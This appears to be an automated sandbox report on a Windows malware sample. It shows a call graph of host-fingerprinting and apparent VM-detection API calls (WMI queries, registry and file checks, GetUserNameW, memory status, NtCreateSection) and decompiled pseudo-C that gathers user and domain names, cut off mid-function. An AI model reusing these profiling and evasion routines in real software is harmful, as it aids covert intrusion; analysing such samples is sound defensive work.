215205ce1eb 64341->64342 64343 215205ce1f3 SysAllocString SysAllocString 64342->64343 64344 215205ce38c 64342->64344 64345 215205ce28a 64343->64345 64350 215205ce235 64343->64350 64344->64044 64346 215205ce294 SysFreeString 64345->64346 64354 215205ce29d wcsstr 64345->64354 64346->64354 64347 215205ce281 SysFreeString 64347->64345 64348 215205ce37c 64348->64044 64349 215205ce358 CoUninitialize 64349->64348 64350->64347 64351 215205ce27b CoUninitialize 64350->64351 64351->64347 64353 215205ce333 VariantClear 64353->64354 64354->64348 64354->64349 64354->64353 64356 215205d0410 9 API calls 64355->64356 64357 215205ce3c5 64356->64357 64358 215205ce3cd SysAllocString SysAllocString 64357->64358 64359 215205ce5ab 64357->64359 64360 215205ce45a 64358->64360 64365 215205ce405 64358->64365 64359->64046 64361 215205ce464 SysFreeString 64360->64361 64369 215205ce46d wcsstr 64360->64369 64361->64369 64362 215205ce451 SysFreeString 64362->64360 64363 215205ce59d 64363->64046 64364 215205ce570 CoUninitialize 64364->64363 64365->64362 64366 215205ce44b CoUninitialize 64365->64366 64366->64362 64368 215205ce54f VariantClear 64368->64369 64369->64363 64369->64364 64369->64368 64371 215205d0410 9 API calls 64370->64371 64372 215205cea8b 64371->64372 64373 215205cece3 64372->64373 64374 215205cea93 SysAllocString SysAllocString 64372->64374 64373->64048 64375 215205ceb2a 64374->64375 64380 215205cead5 64374->64380 64377 215205ceb34 SysFreeString 64375->64377 64385 215205ceb3d wcsstr 64375->64385 64376 215205ceb21 SysFreeString 64376->64375 64377->64385 64378 215205cecd3 64378->64048 64379 215205cecad CoUninitialize 64379->64378 64380->64376 64381 215205ceb1b CoUninitialize 64380->64381 64381->64376 64383 215205cebde VariantClear 64383->64385 64384 215205cec33 VariantClear 64384->64385 64385->64378 64385->64379 64385->64383 64385->64384 64386 215205cec88 VariantClear 64385->64386 64386->64385 64389 215205cff00 __ExceptionPtr::__ExceptionPtr 64387->64389 64388 215205cd1d0 35 API calls 64388->64389 64389->64388 64390 215205d0330 12 API calls 64389->64390 64391 215205cff45 64389->64391 64390->64389 64392 215205f59d0 _handle_error 4 API calls 64391->64392 64393 215205ccf07 64392->64393 64393->64078 64394 215205cecf0 64393->64394 64395 215205ced60 __ExceptionPtr::__ExceptionPtr 64394->64395 64396 215205cd1d0 35 API calls 64395->64396 64397 215205d0130 9 API calls 64395->64397 64398 215205cedac 64395->64398 64396->64395 64397->64395 64399 215205f59d0 _handle_error 4 API calls 64398->64399 64400 215205ccf1c 64399->64400 64401 215205cede0 64400->64401 64403 215205cee30 __ExceptionPtr::__ExceptionPtr 64401->64403 64402 215205cd1d0 35 API calls 64402->64403 64403->64402 64404 215205d0330 12 API calls 64403->64404 64405 215205cee75 64403->64405 64404->64403 64406 215205f59d0 _handle_error 4 API calls 64405->64406 64407 215205ccf2a 64406->64407 64408 215205ceea0 64407->64408 64409 215205ceed6 __ExceptionPtr::__ExceptionPtr 64408->64409 64410 215205cef48 SHGetSpecialFolderPathW 64409->64410 64414 215205cf019 GetCurrentProcess 64409->64414 64415 215205cefba 64409->64415 64416 215205cf033 ExpandEnvironmentStringsW 64409->64416 64411 215205cef5f PathCombineW 64410->64411 64412 215205cd1d0 35 API calls 64411->64412 64413 215205cef95 GetFileAttributesW 64412->64413 64413->64409 64414->64409 64417 215205f59d0 _handle_error 4 API calls 64415->64417 64416->64411 64418 215205ccf38 64417->64418 64419 215205cf110 64418->64419 64422 215205cf12b 64419->64422 64420 215205d0670 58 API calls 64420->64422 64421 215205cf152 64421->64058 64422->64420 64422->64421 64424 215205d0670 58 API calls 64423->64424 64425 215205cf0a1 64424->64425 64425->64060 64427 215205cf370 __ExceptionPtr::__ExceptionPtr 64426->64427 64428 215205cd1d0 35 API calls 64427->64428 64431 215205cf3d5 64427->64431 64429 215205cf3a0 RegOpenKeyExW 64428->64429 64429->64427 64430 215205cf3d9 RegCloseKey 64429->64430 64430->64431 64432 215205f59d0 _handle_error 4 API calls 64431->64432 64433 215205ccf69 64432->64433 64434 215205cf410 64433->64434 64435 215205cf4cc __ExceptionPtr::__ExceptionPtr 64434->64435 64436 215205cf4dd GetWindowsDirectoryW 64435->64436 64437 215205d00a0 GetCurrentProcess 64436->64437 64438 215205cf4fb 64437->64438 64439 215205cf4ff Wow64DisableWow64FsRedirection 64438->64439 64441 215205cf50a __ExceptionPtr::__ExceptionPtr 64438->64441 64439->64441 64440 215205cf510 PathCombineW 64440->64441 64441->64440 64442 215205cd1d0 35 API calls 64441->64442 64448 215205cf572 64441->64448 64443 215205cf556 GetFileAttributesW 64442->64443 64443->64441 64444 215205cf5a0 64445 215205f59d0 _handle_error 4 API calls 64444->64445 64446 215205ccf77 64445->64446 64451 215205cf630 64446->64451 64447 215205cf5df GetCurrentProcess 64449 215205cf5ef 64447->64449 64448->64444 64448->64447 64449->64444 64450 215205cf5f6 Wow64RevertWow64FsRedirection 64449->64450 64450->64444 64452 215205cf65e __ExceptionPtr::__ExceptionPtr 64451->64452 64453 215205d00a0 GetCurrentProcess 64452->64453 64454 215205cf68f 64453->64454 64455 215205cf6b0 SHGetSpecialFolderPathW 64454->64455 64456 215205cf69b ExpandEnvironmentStringsW 64454->64456 64457 215205cf6bf PathCombineW GetFileAttributesW 64455->64457 64456->64457 64458 215205cf70e 64457->64458 64459 215205cf6ed 64457->64459 64461 215205f59d0 _handle_error 4 API calls 64458->64461 64459->64458 64460 215205cf6f1 64459->64460 64462 215205f59d0 _handle_error 4 API calls 64460->64462 64463 215205cf720 64461->64463 64464 215205cf706 64462->64464 64463->64066 64464->64066 64468 215205cfe50 __ExceptionPtr::__ExceptionPtr 64465->64468 64466 215205cd1d0 35 API calls 64466->64468 64467 215205d0330 12 API calls 64467->64468 64468->64466 64468->64467 64469 215205cfe95 64468->64469 64470 215205f59d0 _handle_error 4 API calls 64469->64470 64471 215205ccf96 64470->64471 64471->64069 64473 215205d0410 9 API calls 64472->64473 64474 215205cfa85 64473->64474 64475 215205ccfbc 64474->64475 64476 215205cfa8d SysAllocString SysAllocString 64474->64476 64475->64078 64490 215205cf810 64475->64490 64477 215205cfb1a 64476->64477 64480 215205cfac5 64476->64480 64478 215205cfb24 SysFreeString 64477->64478 64482 215205cfb2d 64477->64482 64478->64482 64479 215205cfb11 SysFreeString 64479->64477 64480->64479 64483 215205cfb0b CoUninitialize 64480->64483 64481 215205cfc15 CoUninitialize 64481->64475 64482->64475 64482->64481 64485 215205cfbb2 StrStrIW 64482->64485 64486 215205cfbf4 VariantClear 64482->64486 64483->64479 64487 215205cfbc8 StrStrIW 64485->64487 64488 215205cfc17 VariantClear 64485->64488 64486->64482 64487->64488 64489 215205cfbde StrStrIW 64487->64489 64488->64481 64489->64486 64489->64488 64491 215205cf919 64490->64491 64492 215205cf921 GetUserNameW 64491->64492 64493 215205cf933 64491->64493 64492->64493 64497 215205cf959 64492->64497 64494 215205f59d0 _handle_error 4 API calls 64493->64494 64495 215205ccfcd 64494->64495 64495->64078 64499 215205cf9f0 GlobalMemoryStatusEx 64495->64499 64496 215205cd1d0 35 API calls 64496->64497 64497->64493 64497->64496 64562 215206019f0 25 API calls 4 library calls 64497->64562 64500 215205f59d0 _handle_error 4 API calls 64499->64500 64501 215205ccfdd 64500->64501 64501->64078 64502 215205cfc60 17 API calls _handle_error 64501->64502 64502->64078 64504 215205cd1f5 swprintf 64503->64504 64507 215205fe574 64504->64507 64508 215205fe588 64507->64508 64509 215205fe5c4 64507->64509 64508->64509 64512 215205fe592 64508->64512 64520 21520603944 11 API calls _Wcrtomb 64509->64520 64511 215205fe5bc 64521 215205faabc 11 API calls _invalid_parameter_noinfo 64511->64521 64518 215205fb244 35 API calls 6 library calls 64512->64518 64515 215205fe5ab 64516 215205cd214 RegOpenKeyExW 64515->64516 64519 21520603944 11 API calls _Wcrtomb 64515->64519 64516->64187 64516->64188 64518->64515 64519->64511 64520->64511 64521->64516 64532 215205f8ef0 64522->64532 64525 215205d01a0 RegQueryValueExW 64527 215205d01f1 RegCloseKey 64525->64527 64528 215205d01cc StrStrIW 64525->64528 64526 215205d01fc 64530 215205f59d0 _handle_error 4 API calls 64526->64530 64527->64526 64528->64527 64529 215205d01df RegCloseKey 64528->64529 64529->64526 64531 215205d020e 64530->64531 64531->64194 64533 215205d0171 RegOpenKeyExW 64532->64533 64533->64525 64533->64526 64536 215205d00b8 64534->64536 64535 215205d00c8 64535->64212 64536->64535 64537 215205d010e GetCurrentProcess 64536->64537 64538 215205d011e 64537->64538 64538->64212 64540 215205d042e 64539->64540 64541 215205d043b CoInitializeSecurity 64539->64541 64540->64265 64542 215205d0471 CoCreateInstance 64541->64542 64543 215205d0494 CoUninitialize 64541->64543 64542->64543 64544 215205d04ac SysAllocString 64542->64544 64543->64265 64545 215205d050a CoSetProxyBlanket 64544->64545 64547 215205d04c6 64544->64547 64546 215205d0556 64545->64546 64550 215205d053a CoUninitialize 64545->64550 64546->64265 64548 215205d0504 SysFreeString 64547->64548 64549 215205d04fc SysFreeString 64547->64549 64548->64545 64549->64550 64550->64546 64552->64301 64554 215205d06a0 64553->64554 64555 215205d074e 64554->64555 64556 215205d0766 64554->64556 64558 215205d06b0 64554->64558 64560 215205cff70 58 API calls swprintf 64555->64560 64556->64558 64561 215205cff70 58 API calls swprintf 64556->64561 64558->64304 64560->64558 64561->64558 64562->64497 64563 7ffa535fb5b0 64564 7ffa535e1000 2 API calls 64563->64564 64565 7ffa535fb63d 64564->64565 64566 7ffa535fb6a1 NtCreateSection 64565->64566 64567 7ffa535fb68a GetCurrentThreadId 64565->64567 64569 7ffa535fb732 64566->64569 64570 7ffa535fb700 64566->64570 64567->64566 64568 7ffa535fb69a 64567->64568 64568->64566 64571 7ffa535e1000 2 API calls 64569->64571 64571->64570

                Executed Functions

                Function 0000021520589E00 Relevance: 80.8, APIs: 23, Strings: 22, Instructions: 2002sleepstringthreadCOMMONCrypto
                Download Yara Rule
                C-Code - Quality: 30%
                			E0000021521520589E00(void* __edx, void* __ebp, void* __esp, void* __rax, long long __rbx, void* __r8, signed int __r9, void* __r11) {
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* __r12;
				void* __r13;
				void* __r14;
				void* __r15;
				void* _t712;
				void* _t762;
				void* _t767;
				void* _t769;
				void* _t778;
				void* _t798;
				signed int _t818;
				void* _t821;
				void* _t823;
				void* _t824;
				void* _t825;
				void* _t826;
				void* _t845;
				void* _t851;
				void* _t865;
				void* _t866;
				void* _t868;
				void* _t869;
				void* _t870;
				void* _t875;
				void* _t878;
				void* _t882;
				void* _t883;
				void* _t884;
				void* _t887;
				void* _t888;
				void* _t890;
				void* _t892;
				void* _t906;
				void* _t908;
				void* _t915;
				void* _t916;
				void* _t917;
				void* _t919;
				void* _t920;
				void* _t921;
				int _t924;
				void* _t925;
				void* _t926;
				long _t932;
				void* _t943;
				void* _t948;
				void* _t950;
				void* _t953;
				void* _t954;
				void* _t955;
				void* _t956;
				void* _t957;
				void* _t958;
				void* _t959;
				void* _t960;
				void* _t961;
				void* _t963;
				void* _t965;
				signed int _t968;
				signed int _t969;
				signed int _t982;
				signed char _t988;
				signed char _t991;
				signed char _t996;
				signed char _t1003;
				signed char _t1005;
				void* _t1042;
				void* _t1257;
				signed int _t1258;
				signed long long _t1259;
				intOrPtr _t1261;
				signed long long _t1262;
				intOrPtr _t1264;
				long long _t1265;
				long long _t1267;
				intOrPtr _t1276;
				intOrPtr _t1278;
				signed long long _t1279;
				signed long long* _t1281;
				intOrPtr _t1282;
				intOrPtr _t1284;
				signed long long _t1285;
				intOrPtr _t1287;
				signed long long _t1289;
				signed long long _t1292;
				signed long long _t1294;
				signed long long _t1297;
				signed int* _t1301;
				signed long long _t1303;
				signed long long _t1306;
				signed long long _t1308;
				signed long long _t1310;
				signed long long _t1313;
				signed long long _t1315;
				signed long long _t1317;
				signed long long _t1320;
				signed long long _t1322;
				signed long long _t1325;
				signed long long _t1327;
				intOrPtr _t1333;
				intOrPtr _t1335;
				signed long long _t1336;
				long long _t1338;
				intOrPtr _t1340;
				intOrPtr _t1342;
				signed long long _t1343;
				intOrPtr _t1345;
				signed int _t1346;
				intOrPtr _t1347;
				intOrPtr _t1349;
				intOrPtr _t1350;
				intOrPtr _t1352;
				intOrPtr _t1355;
				intOrPtr _t1357;
				long long _t1358;
				intOrPtr _t1360;
				signed long long _t1362;
				intOrPtr _t1364;
				signed long long _t1368;
				signed long long _t1370;
				signed long long _t1372;
				signed long long _t1374;
				signed long long _t1376;
				void* _t1378;
				intOrPtr _t1382;
				intOrPtr _t1383;
				intOrPtr _t1387;
				intOrPtr _t1407;
				void* _t1408;
				intOrPtr _t1410;
				void* _t1411;
				intOrPtr _t1428;
				void* _t1429;
				intOrPtr _t1458;
				void* _t1459;
				intOrPtr _t1461;
				void* _t1462;
				intOrPtr _t1471;
				void* _t1472;
				intOrPtr _t1474;
				void* _t1475;
				intOrPtr _t1522;
				void* _t1523;
				intOrPtr _t1525;
				void* _t1526;
				intOrPtr _t1583;
				void* _t1584;
				intOrPtr _t1586;
				void* _t1587;
				intOrPtr _t1619;
				void* _t1620;
				intOrPtr _t1622;
				void* _t1623;
				intOrPtr _t1632;
				void* _t1633;
				intOrPtr _t1638;
				void* _t1639;
				intOrPtr _t1644;
				void* _t1645;
				intOrPtr _t1710;
				void* _t1808;
				signed long long _t1812;
				intOrPtr _t1816;
				intOrPtr _t1817;
				void* _t1818;
				long long _t1820;
				intOrPtr _t1822;
				void* _t1823;
				long long* _t1824;
				void* _t1825;
				void* _t1826;
				void* _t1900;
				void* _t1912;
				void* _t1913;
				signed long long _t1917;
				signed long long _t1918;
				signed long long _t1920;
				void* _t1921;
				long long _t1922;
				long long _t1923;
				long long _t1924;
				long long _t1925;

				_t1913 = __r11;
				_t1365 = __rbx;
				_t1257 = __rax;
				_t1824 = _t1825 - 0x980;
				_t1826 = _t1825 - 0xa80;
				 *((long long*)(_t1824 + 0x538)) = 0xfffffffe;
				 *((long long*)(_t1826 + 0xac0)) = __rbx;
				r14d = 0;
				 *(_t1824 + 0x160) = _t1918;
				 *(_t1824 + 0x168) = _t1918;
				 *(_t1824 + 0x168) = 0xf;
				 *(_t1824 + 0x160) = _t1918;
				 *(_t1824 + 0x150) = r14b;
				_t1387 =  *0x20683378; // 0x20c
				if (_t1387 == 0) goto 0x20589e6d;
				WaitForSingleObject(??, ??);
				if ( *0x20683368 == 0) goto 0x20589e91;
				_t1891 = __r9 | 0xffffffff;
				r8d = 0;
				E0000021521520586C40(__rbx, _t1824 + 0x150, 0x20683358, _t1808, _t1818, __r8, __r9 | 0xffffffff); // executed
				_t712 = E00000215215205CCD00(); // executed
				if (_t712 != 0) goto 0x2058c0ab;
				E00000215215205FAE64(_t712, _t1257, _t1824 + 0x150, 0x20683358);
				E00000215215205FAB80(0, _t1257);
				_t1258 = _t1824 + 0x9d8;
				 *(_t1826 + 0x28) = _t1258;
				 *(_t1826 + 0x20) = r14d;
				r9d = 0;
				E00000215215205FACE4(0, 0, _t1258, _t1365, _t1257, _t1818, 0x21520589d90, __r9 | 0xffffffff);
				 *0x206832b8 = _t1258;
				 *(_t1826 + 0x60) = _t1918;
				 *(_t1826 + 0x68) = _t1918;
				 *(_t1826 + 0x68) = 0xf;
				 *(_t1826 + 0x60) = _t1918;
				 *((char*)(_t1826 + 0x50)) = 0;
				if ("iKInPE9WrB" != 0) goto 0x20589f0a;
				goto 0x20589f1a;
				if ( *((char*)("iKInPE9WrB" + (_t1918 | 0xffffffff) + 1)) != 0) goto 0x20589f10;
				E0000021521520586B10(_t1365, _t1826 + 0x50, "iKInPE9WrB", _t1818, (_t1918 | 0xffffffff) + 1);
				if ( *(_t1826 + 0x60) == 0) goto 0x2058a05e;
				_t1668 =  >=  ?  *((void*)(_t1826 + 0x50)) : _t1826 + 0x50;
				r8d =  *(_t1826 + 0x60);
				E0000021521520581080(_t1824 + 0x650,  >=  ?  *((void*)(_t1826 + 0x50)) : _t1826 + 0x50);
				r8d = 0x4f;
				E0000021521520581420( *(_t1826 + 0x68) - 0x10, _t1824 + 0x650, "127.0.0.1");
				_t1671 =  >=  ?  *((void*)(_t1826 + 0x50)) : _t1826 + 0x50;
				r8d =  *(_t1826 + 0x60);
				E0000021521520581080(_t1824 + 0x870,  >=  ?  *((void*)(_t1826 + 0x50)) : _t1826 + 0x50);
				r8d = 0x4f;
				E0000021521520581420( *(_t1826 + 0x68) - 0x10, _t1824 + 0x870, 0x2067e190);
				_t1674 =  >=  ?  *((void*)(_t1826 + 0x50)) : _t1826 + 0x50;
				r8d =  *(_t1826 + 0x60);
				E0000021521520581080(_t1824 + 0x760,  >=  ?  *((void*)(_t1826 + 0x50)) : _t1826 + 0x50);
				r8d = 0x4f;
				E0000021521520581420( *(_t1826 + 0x68) - 0x10, _t1824 + 0x760, 0x2067e1e0);
				_t1677 =  >=  ?  *((void*)(_t1826 + 0x50)) : _t1826 + 0x50;
				r8d =  *(_t1826 + 0x60);
				E0000021521520581080(_t1824 + 0x390,  >=  ?  *((void*)(_t1826 + 0x50)) : _t1826 + 0x50);
				r8d = 0xfff;
				E0000021521520581290(E0000021521520581290(E0000021521520581290(E0000021521520581290(E0000021521520581420( *(_t1826 + 0x68) - 0x10, _t1824 + 0x390, 0x2067d140), _t1824 + 0x390), _t1824 + 0x760), _t1824 + 0x870), _t1824 + 0x650);
				 *(_t1824 + 0x1a0) = _t1918;
				 *(_t1824 + 0x1a8) = _t1918;
				 *(_t1824 + 0x1a8) = 0xf;
				 *(_t1824 + 0x1a0) = _t1918;
				 *((char*)(_t1824 + 0x190)) = 0;
				if ( *0x2067e1e0 != 0) goto 0x2058a093;
				goto 0x2058a0aa;
				asm("o16 nop [eax+eax]");
				if ( *((char*)(0x2067e1e0 + (_t1918 | 0xffffffff) + 1)) != 0) goto 0x2058a0a0;
				E0000021521520586B10(0x2067e1e0, _t1824 + 0x190, 0x2067e1e0, 0x2067d140, (_t1918 | 0xffffffff) + 1);
				 *(_t1824 - 0x80) = _t1918;
				 *(_t1824 - 0x78) = _t1918;
				 *(_t1824 - 0x78) = 0xf;
				 *(_t1824 - 0x80) = _t1918;
				 *((char*)(_t1826 + 0x70)) = 0;
				if ( *0x2067e190 != 0) goto 0x2058a0e1;
				goto 0x2058a0ef;
				if ( *((char*)(0x2067e190 + (_t1918 | 0xffffffff) + 1)) != 0) goto 0x2058a0e5;
				E0000021521520586B10(0x2067e1e0, _t1826 + 0x70, 0x2067e190, 0x2067d140, (_t1918 | 0xffffffff) + 1);
				 *(_t1824 - 0x40) = _t1918;
				 *(_t1824 - 0x38) = _t1918;
				 *(_t1824 - 0x38) = 0xf;
				 *(_t1824 - 0x40) = _t1918;
				 *((char*)(_t1824 - 0x50)) = 0;
				if ( *0x2067d140 != 0) goto 0x2058a123;
				goto 0x2058a13a;
				asm("o16 nop [eax+eax]");
				if ( *((char*)(0x2067d140 + (_t1918 | 0xffffffff) + 1)) != 0) goto 0x2058a130;
				E0000021521520586B10(0x2067e1e0, _t1824 - 0x50, 0x2067d140, 0x2067d140, (_t1918 | 0xffffffff) + 1);
				E00000215215205871E0(0, 0, 0x2067e1e0, _t1824 + 0xd0, 0x2067e190, 0x2067d140, _t1826 + 0x70, _t1891);
				r15d = 0x1000;
				_t1259 =  *(_t1824 - 0x38);
				if (_t1259 - 0x10 < 0) goto 0x2058a1b6;
				_t1407 =  *((intOrPtr*)(_t1824 - 0x50));
				if (_t1259 + 1 - _t1921 < 0) goto 0x2058a1b1;
				if (0 == 0) goto 0x2058a184;
				0x205faadc();
				asm("int3");
				_t1261 =  *((intOrPtr*)(_t1407 - 8));
				if (_t1261 - _t1407 < 0) goto 0x2058a193;
				0x205faadc();
				asm("int3");
				_t1408 = _t1407 - _t1261;
				if (_t1408 - 8 >= 0) goto 0x2058a1a2;
				0x205faadc();
				asm("int3");
				if (_t1408 - 0x27 <= 0) goto 0x2058a1ae;
				0x205faadc();
				asm("int3");
				0x205f51e4();
				 *(_t1824 - 0x38) = 0xf;
				 *(_t1824 - 0x40) = _t1918;
				 *((char*)(_t1824 - 0x50)) = 0;
				_t1262 =  *(_t1824 - 0x78);
				if (_t1262 - 0x10 < 0) goto 0x2058a21a;
				_t1410 =  *((intOrPtr*)(_t1826 + 0x70));
				if (_t1262 + 1 - _t1921 < 0) goto 0x2058a215;
				if (0 == 0) goto 0x2058a1e8;
				0x205faadc();
				asm("int3");
				_t1264 =  *((intOrPtr*)(_t1410 - 8));
				if (_t1264 - _t1410 < 0) goto 0x2058a1f7;
				0x205faadc();
				asm("int3");
				_t1411 = _t1410 - _t1264;
				if (_t1411 - 8 >= 0) goto 0x2058a206;
				0x205faadc();
				asm("int3");
				if (_t1411 - 0x27 <= 0) goto 0x2058a212;
				0x205faadc();
				asm("int3");
				0x205f51e4();
				 *(_t1824 - 0x78) = 0xf;
				 *(_t1824 - 0x80) = _t1918;
				 *((char*)(_t1826 + 0x70)) = 0;
				if ( *(_t1826 + 0x60) == 0) goto 0x2058a34c;
				_t1684 =  >=  ?  *((void*)(_t1826 + 0x50)) : _t1826 + 0x50;
				r8d =  *(_t1826 + 0x60);
				E0000021521520581080(_t1824 + 0x390,  >=  ?  *((void*)(_t1826 + 0x50)) : _t1826 + 0x50);
				r8d = 0x50;
				E00000215215205812A0(_t1824 + 0x390, "127.0.0.1", _t1891);
				_t1687 =  >=  ?  *((void*)(_t1826 + 0x50)) : _t1826 + 0x50;
				r8d =  *(_t1826 + 0x60);
				E0000021521520581080(_t1824 + 0x760,  >=  ?  *((void*)(_t1826 + 0x50)) : _t1826 + 0x50);
				r8d = 0x50;
				E00000215215205812A0(_t1824 + 0x760, 0x2067e190, _t1891);
				_t1690 =  >=  ?  *((void*)(_t1826 + 0x50)) : _t1826 + 0x50;
				r8d =  *(_t1826 + 0x60);
				E0000021521520581080(_t1824 + 0x870,  >=  ?  *((void*)(_t1826 + 0x50)) : _t1826 + 0x50);
				r8d = 0x50;
				E00000215215205812A0(_t1824 + 0x870, 0x2067e1e0, _t1891);
				_t1693 =  >=  ?  *((void*)(_t1826 + 0x50)) : _t1826 + 0x50;
				r8d =  *(_t1826 + 0x60);
				E0000021521520581080(_t1824 + 0x650,  >=  ?  *((void*)(_t1826 + 0x50)) : _t1826 + 0x50);
				r8d = r15d;
				E0000021521520581290(E0000021521520581290(E0000021521520581290(E0000021521520581290(E00000215215205812A0(_t1824 + 0x650, 0x2067d140, _t1891), _t1824 + 0x650), _t1824 + 0x870), _t1824 + 0x760), _t1824 + 0x390);
				 *(_t1824 + 0x1c0) = _t1918;
				 *(_t1824 + 0x1c8) = _t1918;
				 *(_t1824 + 0x1c8) = 0xf;
				 *(_t1824 + 0x1c0) = _t1918;
				 *((char*)(_t1824 + 0x1b0)) = 0;
				__imp__CoInitializeEx();
				 *(_t1826 + 0x40) = _t1918;
				 *(_t1826 + 0x38) = r14d;
				 *(_t1826 + 0x30) = _t1918;
				r13d = 3;
				 *(_t1826 + 0x28) = r13d;
				 *(_t1826 + 0x20) = r14d;
				r9d = 0;
				r8d = 0;
				__imp__CoInitializeSecurity();
				E00000215215205CA49C(_t1264, 0x2067e1e0);
				_t129 = _t1824 + 0x370; // 0x373
				E00000215215205CBE80(0, 0x2067e1e0, _t129, 0x2067e190, _t1826 + 0x70);
				_t130 = _t1824 - 0x18; // -21
				E00000215215205CBB80(0, 0x2067e1e0, _t130, 0x2067e190, _t1826 + 0x70);
				_t131 = _t1824 + 0x370; // 0x373
				_t132 = _t1824 + 0x2d8; // 0x2db
				E00000215215205895D0(_t132, _t1264, 0x2067e190, 0x2067d140, _t1824, _t131, _t1891);
				_t1265 =  *_t1824;
				if (_t1265 - 0x10 < 0) goto 0x2058a433;
				_t1428 =  *((intOrPtr*)(_t1824 - 0x18));
				if (_t1265 + 1 - _t1921 < 0) goto 0x2058a42e;
				if (0 == 0) goto 0x2058a401;
				0x205faadc();
				asm("int3");
				_t1267 =  *((intOrPtr*)(_t1428 - 8));
				if (_t1267 - _t1428 < 0) goto 0x2058a410;
				0x205faadc();
				asm("int3");
				_t1429 = _t1428 - _t1267;
				if (_t1429 - 8 >= 0) goto 0x2058a41f;
				0x205faadc();
				asm("int3");
				if (_t1429 - 0x27 <= 0) goto 0x2058a42b;
				0x205faadc();
				asm("int3");
				0x205f51e4();
				 *_t1824 = 0xf;
				 *(_t1824 - 8) = _t1918;
				 *((char*)(_t1824 - 0x18)) = 0;
				 *((long long*)(_t1824 + 0x558)) = _t1267;
				 *((long long*)(_t1824 + 0x560)) = _t1267;
				 *((long long*)(_t1824 + 0x568)) = _t1267;
				 *((long long*)(_t1824 + 0x570)) = _t1267;
				 *((long long*)(_t1824 + 0x578)) = _t1267;
				 *((long long*)(_t1824 + 0x580)) = _t1267;
				 *((long long*)(_t1824 + 0x588)) = _t1267;
				 *((long long*)(_t1824 + 0x590)) = _t1267;
				_t147 = _t1824 + 0x540; // 0x543
				E00000215215205815E0(_t147);
				_t148 = _t1824 + 0x540; // 0x543
				E00000215215205815E0(_t148);
				_t149 = _t1824 + 0x2d8; // 0x2db
				_t1697 =  >=  ?  *((void*)(_t1824 + 0x2d8)) : _t149;
				r8d =  *(_t1824 + 0x2e8);
				_t153 = _t1824 + 0x540; // 0x543
				E0000021521520581630(_t153,  >=  ?  *((void*)(_t1824 + 0x2d8)) : _t149, _t131);
				_t154 = _t1824 + 0x540; // 0x543
				E0000021521520583620(0xffffffff, _t154);
				_t155 = _t1824 + 0x598; // 0x59b
				_t156 = _t1824 + 0x1d0; // 0x1d3
				E0000021521520581460(_t156, _t155, _t1913);
				_t157 = _t1824 + 0x1d0; // 0x1d3
				if (E00000215215205C7480(_t1267, 0x2067e1e0, _t157) != 0) goto 0x2058a509;
				__imp__CoUninitialize();
				TerminateThread(??, ??);
				goto 0x2058c021;
				r8d = 0;
				_t159 = _t1824 + 0x298; // 0x29b
				_t160 = _t1824 + 0x1d0; // 0x1d3
				E000002152152058C4C0(_t1267, _t160, _t159);
				_t162 = _t1824 + 0x4f8; // 0x4fb
				_t163 = _t1824 + 0x1d0; // 0x1d3
				E000002152152058C4C0(_t1267, _t163, _t162);
				_t164 = _t1824 + 0x220; // 0x223
				E00000215215205CC000(0, 0x2067e1e0, _t164, 0x2067e190,  *(_t1824 + 0x1e0) >> 1);
				if ( *((long long*)(_t1824 + 0x380)) == 0) goto 0x2058a5bc;
				r8d = 1;
				_t166 = _t1824 + 0x220; // 0x223
				E0000021521520588C10(0x2067e1e0, _t166, "\n", 0x2067e190, _t1824,  *(_t1824 + 0x1e0) >> 1);
				_t167 = _t1824 + 0x370; // 0x373
				_t168 = _t1824 + 0x2b8; // 0x2bb
				E00000215215205893D0(0x2067e1e0, _t168, "User name: ", 0x2067d140, _t1824, _t167,  *(_t1824 + 0x1e0) >> 0x00000001 | 0xffffffff);
				r8d = r8d ^ r8d;
				_t169 = _t1824 + 0x220; // 0x223
				_t762 = E0000021521520588D60(0x2067e1e0, _t169, _t1267, 0x2067e190, 0x2067d140, _t1824, _t167,  *(_t1824 + 0x1e0) >> 0x00000001 | 0xffffffffffffffff);
				_t170 = _t1824 + 0x2b8; // 0x2bb
				E0000021521520586820(_t762, 0, _t170);
				_t171 = _t1824 + 0x4d8; // 0x4db
				E00000215215205CBD00(0, 0x2067e1e0, _t171, 0x2067e190, _t167);
				if ( *((long long*)(_t1824 + 0x4e8)) == 0) goto 0x2058a627;
				_t173 = _t1824 + 0x220; // 0x223
				E0000021521520588C10(0x2067e1e0, _t173, "\n", 0x2067e190, _t1824, 0x2067d140);
				_t174 = _t1824 + 0x4d8; // 0x4db
				_t175 = _t1824 + 0x2b8; // 0x2bb
				E00000215215205893D0(0x2067e1e0, _t175, "Domain name: ", 0x2067d140, _t1824, _t174,  *(_t1824 + 0x1e0) >> 0x00000001 | 0xffffffffffffffff);
				r8d = r8d ^ r8d;
				_t176 = _t1824 + 0x220; // 0x223
				_t767 = E0000021521520588D60(0x2067e1e0, _t176, _t1267, 0x2067e190, 0x2067d140, _t1824, _t174,  *(_t1824 + 0x1e0) >> 0x00000001 | 0xffffffffffffffff);
				_t177 = _t1824 + 0x2b8; // 0x2bb
				E0000021521520586820(_t767, 0, _t177);
				 *(_t1824 + 0x250) = _t1918;
				 *(_t1824 + 0x258) = _t1918;
				 *(_t1824 + 0x258) = 0xf;
				 *(_t1824 + 0x250) = _t1918;
				 *((char*)(_t1824 + 0x240)) = 0;
				r8d = 0;
				_t183 = _t1824 + 0x150; // 0x153
				_t184 = _t1824 + 0x240; // 0x243
				_t769 = E0000021521520586C40(0x2067e1e0, _t184, _t183, 0x2067e190, 0x2067d140, _t174,  *(_t1824 + 0x1e0) >> 0x00000001 | 0xffffffffffffffff);
				_t185 = _t1824 + 0x298; // 0x29b
				_t1709 =  >=  ?  *((void*)(_t1824 + 0x298)) : _t185;
				r8d = 0;
				_t189 = _t1824 + 0x240; // 0x243
				E0000021521520586A20(_t769, _t189,  >=  ?  *((void*)(_t1824 + 0x298)) : _t185, _t174,  *((intOrPtr*)(_t1824 + 0x2a8)));
				 *(_t1824 + 0x9c8) = _t1267 != 0xffffffff;
				asm("xorps xmm0, xmm0");
				asm("movdqu [ebp-0x30], xmm0");
				 *(_t1824 - 0x20) = _t1918;
				asm("o16 nop [eax+eax]");
				_t968 = r14d;
				_t1710 =  *((intOrPtr*)(_t1824 + 0xd0));
				if ( *((intOrPtr*)(_t1824 + 0xd8)) - _t1710 >> 6 == 0) goto 0x2058b901;
				_t194 = (_t1918 << 6) + _t1710 + 0x20; // 0x20
